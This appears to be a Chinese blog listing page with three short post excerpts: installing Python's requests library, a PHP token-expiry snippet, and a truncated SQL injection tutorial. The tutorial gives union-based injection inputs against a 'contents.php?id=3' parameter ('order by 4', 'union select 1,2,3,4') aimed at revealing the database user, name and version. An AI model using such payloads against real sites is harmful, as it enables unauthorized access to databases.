摘要: 1.安装1 git clone git://github.com/kennethreitz/requests.git2 cd requests3 python setup.py install2.上点威力(GET)1 >>> import requests2 >>> url = 'http://di... 阅读全文
posted @ 2014-11-02 20:34 天天AC 阅读(680) 评论(0) 推荐(0)
摘要: 通过一个小例子,希望对大家的PHP程序设计有帮助PHP代码 1 $expire_time) {13 echo “expired token”;14 echo "";15 }16 echo $_token;17 echo... 阅读全文
posted @ 2014-11-02 18:04 天天AC 阅读(230) 评论(0) 推荐(0)
摘要: (1)SQL注入点contents.php?id=3(2)字段数contents.php?id=3 order by 4(3)显示位数4contents.php?id=3 union select 1,2,3,4正常(4)爆出用户名,数据库,版本号contents.php?id=3 UNION se... 阅读全文
posted @ 2014-11-02 09:52 天天AC 阅读(971) 评论(0) 推荐(0)